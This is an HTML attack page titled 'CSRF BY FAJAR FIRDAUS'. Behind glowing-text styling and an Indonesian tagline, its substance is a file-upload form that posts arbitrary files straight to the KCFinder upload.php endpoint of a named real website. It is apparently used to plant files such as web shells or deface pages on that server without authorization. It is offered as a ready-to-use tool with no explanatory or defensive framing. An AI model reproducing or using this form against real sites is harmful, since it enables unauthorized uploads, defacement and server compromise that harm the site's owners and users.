<!DOCTYPEHTML>
<html>

<head>
  <title>CSRF FAJAR FIRDAUS</title>
</head>

<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
  background-color: transparent;
  font-family: Courier New;
}

.glow {
  font-size: 30px;
  color: #000000;
  text-align: center;
  -webkit-animation: glow 1s ease-in-out infinite alternate;
  -moz-animation: glow 1s ease-in-out infinite alternate;
  animation: glow 1s ease-in-out infinite alternate;
}

@-webkit-keyframes glow {
  from {
    text-shadow: 0 0 10px #8c8c8c, 0 0 20px #8c8c8c, 0 0 30px #8c8c8c, 0 0 40px #8c8c8c, 0 0 50px #8c8c8c, 0 0 60px #8c8c8c, 0 0 70px #8c8c8c;
  }

  to {
    text-shadow: 0 0 20px #ffffff, 0 0 30px #ffffff, 0 0 40px #ffffff, 0 0 50px #ffffff, 0 0 60px #ffffff, 0 0 70px #ffffff, 0 0 80px #ffffff;
  }
}
</style>
</head>
<body>

<h1 class="glow">CSRF BY FAJAR FIRDAUS</h1>

<body>
  <form method="post" enctype="multipart/form-data" action="http://www.portal.nsa.bg/themes/default/assets/plugins/kcfinder/upload.php">
    <br><center><font color="red">Cuma Seorang programmer no life</font></center></br>
  <input name="Pilih File" type="file">
  <input type="submit" value="Upload">
</form>
</body>
<body background="https://sg.fiverrcdn.com/photos/108673567/original/1820fae2666e30b608e5a567da5bfaa5bd845865.jpg?1520071817">
</html>
